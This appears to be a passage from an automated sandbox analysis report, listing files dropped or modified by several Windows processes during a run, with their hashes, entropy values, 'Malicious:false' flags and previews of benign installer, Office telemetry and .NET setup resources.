                                                            SHA-512:93009B3045939B65A0C1D25E30A07A772BD73DDA518529462F9CE1227A311A4D6FD7595F10B4255CC0B352E09C02026E89300A641492F14DF908AD256A3C9D76
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="utf-16"?>..<SetupUI xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui" xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui" >..  <UI>....    <ResourceDll>SetupResources.dll</ResourceDll>..    <!--..    <SplashScreen>..      <Hide/>..    </SplashScreen>..    -->..    <SplashScreen>..      <FileName>SplashScreen.bmp</FileName>..    </SplashScreen>....    <LCIDHints>..      <LCIDHint>..        <RegKey>HKCU\Software\Microsoft\VisualStudio\9.0\General</
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PC bitmap, Windows 3.x format, 49 x 49 x 8, image size 2550, resolution 2834 x 2834 px/m, cbSize 3628, bits offset 1078
                                                            Category:dropped
                                                            Size (bytes):3628
                                                            Entropy (8bit):4.8382652865388724
                                                            Encrypted:false
                                                            SSDEEP:48:f0sO8Kdwc6o5NF5ghwwpnMOccFpscGqfkemvIQpQK/xHiggTfGRgVC0q:cMa1krnrJmdQ+EgyfG3
                                                            MD5:514BFCD8DA66722A9639EB41ED3988B7
                                                            SHA1:CF11618E3A3C790CD5239EE749A5AE513B4205CD
                                                            SHA-256:6B8201ED10CE18FFADE072B77C6D1FCACCF1D29ACB47D86F553D9BEEBD991290
                                                            SHA-512:89F01C3361BA874015325007EA24E83AE6E73700996D0912695A4E7CB3F8A611494BA9D63F004DCD4F358821E756BE114BCF0137ED9B130776A6E26A95382C7B
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):144416
                                                            Entropy (8bit):6.7404750879679485
                                                            Encrypted:false
                                                            SSDEEP:3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
                                                            MD5:3F0363B40376047EFF6A9B97D633B750
                                                            SHA1:4EAF6650ECA5CE931EE771181B04263C536A948B
                                                            SHA-256:BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
                                                            SHA-512:537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PC bitmap, Windows 3.x format, 164 x 628 x 8, image size 102994, resolution 3779 x 3779 px/m, cbSize 104072, bits offset 1078
                                                            Category:dropped
                                                            Size (bytes):104072
                                                            Entropy (8bit):7.2628723112196
                                                            Encrypted:false
                                                            SSDEEP:768:QKUpOeBmAj72KbvEvffvCv7cTIMUHuRzHA8X9H51T9ho4xw7CgB1:QKULmAfbvEv47cIHzE9vo4SuU1
                                                            MD5:B0075CEE80173D764C0237E840BA5879
                                                            SHA1:B4CF45CD5BB036F4F210DFCBA6AC16665A7C56A8
                                                            SHA-256:AB18374B3AAB10E5979E080D0410579F9771DB888BA1B80A5D81BA8896E2D33A
                                                            SHA-512:71A748C82CC8B0B42EF5A823BAC4819D290DA2EDDBB042646682BCCC7EB7AB320AFDCFDFE08B1D9EEBE149792B1259982E619F8E33845E33EEC808C546E5C829
                                                            Malicious:false
                                                            Process:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):889416
                                                            Entropy (8bit):7.856409051573377
                                                            Encrypted:false
                                                            SSDEEP:24576:+tW4x8xAxCdUcyezFSjaBHFaNlsqK5/oh6iZf1LUXw/vxNI:d4x8xqCGexm8FCspg0iZf1LUXD
                                                            MD5:53406E9988306CBD4537677C5336ABA4
                                                            SHA1:06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
                                                            SHA-256:FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
                                                            SHA-512:4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1272
                                                            Entropy (8bit):5.35701154853497
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6Kha1qE4GIsCKIE4TKBGKoZAE4KKUNCsXE4Npv:MxHKQwYHKGSI6oa1qHGIsCtHTHhAHKKE
                                                            MD5:C6B44A8E6FB7CA041E86A0771A752AA5
                                                            SHA1:B0CF085072D5FFF851AA53E60E09631A2CDC0363
                                                            SHA-256:5994B74D02CA48DC49F353BE97E8293E3AE08B043B0BE27622868ACB25290866
                                                            SHA-512:AEDD76D49E940F3C7AE093351EB2E1B651F869BEBBDC0529B75C1C003ED3863CA4C109F2490F2B42C40AD238DB0537DEF1F2BCF59AD19F9B0367F48CA444BA06
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\
                                                            Process:C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                                                            File Type:CSV text
                                                            Category:modified
                                                            Size (bytes):859
                                                            Entropy (8bit):5.379735105545312
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                            MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                            SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                            SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                            SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:BB7DF04E1B0A2570657527A7E108AE23
                                                            SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                                            SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                                            SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):97
                                                            Entropy (8bit):5.205971983413091
                                                            Encrypted:false
                                                            SSDEEP:3:13ZjF/1jQvP5uOt+kiE2J5xAIw3r3P8XlKs:ZZjOwOwkn23fM/s
                                                            MD5:7359CE0BBF7D35AAE49A00F244F39D77
                                                            SHA1:764FC39D51A56838306F4B2BD9F3DD801ECE5603
                                                            SHA-256:C8236BD2A464FDF94497AD7A699FD21181D1F1000906EDF125D2823E2F0DB5BE
                                                            SHA-512:56715664EAB703E56AEB329637E9A22137EB65A3B93E37B6FE7F73BF468D3EF1C849170974F464004072723314C63EAFAA2D7506D672734178F80B12FCEFA7ED
                                                            Malicious:false
                                                            Preview:S.._..W....U.<F..L..........*file:///C:\Users\user\AppData\Local\Temp\..BlockersInfo1..rtf.....
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):0.09216609452072291
                                                            Encrypted:false
                                                            SSDEEP:3:lSWFN3l/klslpF/4llfll:l9F8E0/
                                                            MD5:F138A66469C10D5761C6CBB36F2163C3
                                                            SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                            SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                            SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:SQLite Rollback Journal
                                                            Category:dropped
                                                            Size (bytes):4616
                                                            Entropy (8bit):0.13760166725504608
                                                            Encrypted:false
                                                            SSDEEP:3:7FEG2l+1xS/FllkpMRgSWbNFl/sl+ltlslVlllfll1r:7+/lGEg9bNFlEs1EP/x
                                                            MD5:155BD38827937DCE5B64F5F6D8276EF4
                                                            SHA1:ECCD7304FADB42048AEE085ED67D4297EEF0E2D5
                                                            SHA-256:742A28DECAD9032C0D699B31C873E90434F247E6F9E84171DB789927BA24F069
                                                            SHA-512:DA54F3F6C96FF9392D2CE319A4E657A14A1B94568B5DD1116728B721381158C9892D84A5C6D8A29F437388E3DD02274892EC6DAFB28A8D0683087D910C7F4106
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.043427841252497504
                                                            Encrypted:false
                                                            SSDEEP:3:G4l2NjEUBX4lCl2NjEUBPslL9//Xlvlll1lllwlvlllglbXdbllAlldl+l:G4l21iCl21aL9XXPH4l942U
                                                            MD5:AD4678387BF39DA9DBEC57F63EC33EE0
                                                            SHA1:B325267CF0323D578E95866645A9701604D4A5F0
                                                            SHA-256:358E2C730DAC868BBB59A0FD4DE719B022DBAAA001A0E432527BFB62E92B24E7
                                                            SHA-512:FABB2F25590774E76E2754F79C88BEFEB9E2DC2F432AE10B6C7A936B717278CF80736C0A6682113D38210E5B5E7B96355A2441ACAEA0A85AD684AFC44707148A
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                            Category:modified
                                                            Size (bytes):45352
                                                            Entropy (8bit):0.3953450218915866
                                                            Encrypted:false
                                                            SSDEEP:24:KNB4leXQ3zRD3CWpUll7DBtDi4kZERDa6zqt8VtbDBtDi4kZERDo:uBAsQ1eWpUll7DYMXzO8VFDYM
                                                            MD5:E395EC87F8AFD6A2AD4DB93316D54DF9
                                                            SHA1:79A2541CECA99A7A2F12EC4E95FB626C3915769F
                                                            SHA-256:3261507DE2CF3AD97C8D756C5B30F8BE5464DFF61449B9DF1AFFC6C22B08EEF3
                                                            SHA-512:8EB9EBF4EE8E55858CE9514C8C99F9FFD58FA6DF78C31066DD9B7050078595C3A2F1F3F55BABDA1F1DFA8C50FB5374D80F2923AAEA094224BC33EBEEF5CF52DB
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2278
                                                            Entropy (8bit):3.8582065897669575
                                                            Encrypted:false
                                                            SSDEEP:48:uiTrlKxsxxIxl9Il8uC1DIqaDVciFNBzyxdd1rc:v0YBqaRvBOxm
                                                            MD5:156C9C0C7DB159907472ADDC69DF3210
                                                            SHA1:F76BEDDF45CB07EDC908C12185CC92D7DEB96D12
                                                            SHA-256:38A5B3F68EAD07292B3849C1DBD5447AB034D8FAABC32A94C1411D9AEF360B63
                                                            SHA-512:2D27AD8567BDEE207C0AD9E3600F4D6680A616C00C89E43BFC2CA9D3DD9A2280936FBEFA7E65D819F90D5151956955898F8FD3DCCD55529122C32D11843885D7
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):4542
                                                            Entropy (8bit):4.004352529348239
                                                            Encrypted:false
                                                            SSDEEP:48:uiTrlKxxx+xD9Il8uCWlSNoAKxUJIm23qLSHMcRUn/ms4o5IqT2xJ/GSjBMZyy5r:RYhSKxtm2aOHw+s8qaRG7RM0rBlVSe
                                                            MD5:202967F42CB349816CCA163808852C84
                                                            SHA1:F60BB1C28A031E9114FDE170C5A6F0E4C4524DCB
                                                            SHA-256:B35FD54A0B25F154A530D921E1E225C223752895FB63F52B1E0EC41671325D6C
                                                            SHA-512:61EFD5398C0642117156239444F7766CCA076F51EDD506F4350EDFD0B10BB2B1DD9AC48D6F410B386E9DDC46039A2F86F9888185D0C5A5ED9878E0DB4CA1DC90
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2160
                                                            Entropy (8bit):2.3094612443201528
                                                            Encrypted:false
                                                            SSDEEP:24:EsqvOuLPYhLmW0VMFqVGRXOruJuNfb6q4LTmqFd:Xqmu7YhyWUGerugNzXiTZd
                                                            MD5:6F0AE5B0693054B90A3BD61045A7C6A6
                                                            SHA1:DD21DBB38D7580104A39287F819CEF22B5362A93
                                                            SHA-256:DD376725224E9F6C90E938436250A5597B7BF2576625DA5AA4848CA2231481E2
                                                            SHA-512:B6D35A4EE268E3F78EE6B98B24576537731CD2F1594CD42D8DEC5780C8F8DB28FA2D6FFD1BFF374F52B858640138576C7C2826E4916DAF4A713BAC5FD82994C8
                                                            Malicious:false
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1536
                                                            Entropy (8bit):1.3120375248498821
                                                            Encrypted:false
                                                            SSDEEP:3:ml+lGl+l+l+l1PPPXll1l7lhlJvl5hzldlxpxl/b1l/pl/Ppl/NllXljl/tl/rlh:mEMEEEul39lCgK1qV23S3y2l8q2sP38n
                                                            MD5:1B75ECA4623ECDE0AB8DD6789CB556CD
                                                            SHA1:8415BA3A5B91D502DB0E5A5C4D84AFC465EDFE82
                                                            SHA-256:91EFA77FC4D1EB33ADA21558C64C44D1101962F184F19FD50BD1870E80F1CC33
                                                            SHA-512:944D3D264AFB2373BB0EF5EAC14B69E216E57D24A15538962FE57AA1B1A6E7C8B46C6D25E49C36BCA060CFE1173255572AB84008248FC7A2D2E2EC93A82E734C
                                                            Malicious:false
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
                                                            Category:dropped
                                                            Size (bytes):708
                                                            Entropy (8bit):5.097676248548782
                                                            Encrypted:false
                                                            SSDEEP:12:MXdLOffQalGYT9Lu+30pfHw7Oo+FDDPOJD8zZi9LRJnVYn8lIz2:MNifQallTv3MswTbYZIz2
                                                            MD5:FF86F79D948C6F43BDE1852C1C66A829
                                                            SHA1:56A223843B07CE5077287CAED98F41ED904E53D6
                                                            SHA-256:FEB27E2D4F63A3ADB399D74E2A7199ABD5C9582AFC0618F968C260A913D6C885
                                                            SHA-512:FCD987163B6D7EC8873ECB95EE16C28EC0B524B5C5AE7D34F24DEC15727C80F3D0B11E8608AC3C2153D7DBE413CBD9EC0841F71BB6DDE64DD1C6904531E38CBD
                                                            Malicious:false
                                                            Preview:{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fnil\fcharset0 MS Shell Dlg 2;}}..\viewkind4\uc1\pard\ul\b\f0\fs23 Details\ulnone\b0\fs17\par..\par..\pard{\pntext\f0 1.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart1\pndec{\pntxta.}}..\li175 Microsoft .NET Framework 4 is already a part of this operating system. You do not need to install the .NET Framework 4 redistributable. \v <A HREF="http://go.microsoft.com/fwlink/?LinkId=164207">\v0 More information\v </A>\v0 . \par..\pard\li175\par..\pard{\pntext\f0 2.\tab}{\*\pn\pnlvlbody\pnf0\pnindent0\pnstart2\pndec{\pntxta.}}..\li175 Same or higher version of .NET Framework 4 has already been installed on this computer.\par..\pard\par..\par..\par..}...
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):20971520
                                                            Entropy (8bit):0.004016794055560718
                                                            Encrypted:false
                                                            SSDEEP:96:vouIVKlFQ8dum7KIuwKTnKSeQ8dYJh+KJ1Q8dX5sQKO0Q8dub9E7e4DKX9Q8dv4d:gjoDKTXhsb043eXBcf
                                                            MD5:D352B1D4318B071829010D9481007EC2
                                                            SHA1:5FBD6CB4E9DC74A53DE1C780E9CE2D82CB1FD786
                                                            SHA-256:E2537FD61A9EE250E2521CD4A2568200E8BF44734A2EA068377EB5950E16096F
                                                            SHA-512:FC324197425DD8A9D7B3C2C629C785E383C930861162D90D496A46EBA2FA89CF843EE4219A6569CF068A9E1A22990FA626C402502010BF46D4650856AEB66822
                                                            Malicious:false
                                                            Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..10/04/2023 13:57:59.100.WINWORD (0x8EC).0x19BC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":29,"Time":"2023-10-04T13:57:59.100Z","Contract":"Office.System.Activity","Activity.CV":"N+zCYEOfD0+qAS4Zv2VxQg.6.1","Activity.Duration":423,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...10/04/2023 13:57:59.100.WINWORD (0x8EC).0x19BC.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":30,"Time":"2023-10-04T13:57:59.100Z","Contract":"Office.System.Activity","Activity.CV":"N+zCYEOfD0+qAS4Zv2VxQg.6","Activity.Duration":3052,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDia
                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):20971520
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                                            SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                                            SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                                            SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                                            Malicious:false
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):16118
                                                            Entropy (8bit):3.6434775915277604
                                                            Encrypted:false
                                                            SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                            MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                            SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                            SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                            SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (477), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65988
                                                            Entropy (8bit):3.708641155096535
                                                            Encrypted:false
                                                            SSDEEP:384:fdsOT01KcBUFJFEWUxFzvHJFNtwcYWo7EhKAIfBUCX2aELAk4UGGGGfRjNDdDtfe:fdsOTLyUFJFEWUxFzvLrWcvAhTQM
                                                            MD5:8D0FB985255B649EBD547F425FECDF82
                                                            SHA1:5B739FCDBC35FB08AB17FA3E419B79FF273C3D65
                                                            SHA-256:EACA522183CFF07B9DD329D77CF17C997FD4E415B0EC42769D175FDE93B70079
                                                            SHA-512:F41118055E5254398BC24670A1E564F7FE39417910FE7029BB682456022E8091B6D129C3671AC1A1102B38E4393D0151167EB8FE8B1EC0FEC699EF9D242155F4
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (388), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):54216
                                                            Entropy (8bit):3.709625881353448
                                                            Encrypted:false
                                                            SSDEEP:384:fdsOT01KcBUFJFEWUxFzvHJFNtwcYWo7EhKAIfBUCX2aELAk4UGGGGfRjNDdDtfD:fdsOTLyUFJFEWUxFzvLrWi
                                                            MD5:D58EBB822E9E0043F6836781009B9C3B
                                                            SHA1:C8BC428D855E4368046A1C950BE597875D7463F3
                                                            SHA-256:781BB976BA34F870741AC8359D4CBD4DF251F1923B7C7223CCF83A6EB012F379
                                                            SHA-512:F5D22DCECBC791E06E6EFF9D0ACAF1867C6593ABFFA728A326687EA2940C9740D373CCFB6CD8A5403C363EAFA394D3A7E6B20E08380F43D3B2B2B5A00D0127EF
                                                            Malicious:false
                                                            Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.
                                                            Process:C:\6c8944922f7b98d0b6cd82b768\Setup.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 2057
                                                            Category:modified
                                                            Size (bytes):708
                                                            Entropy (8bit):5.097676248548782
                                                            Encrypted:false
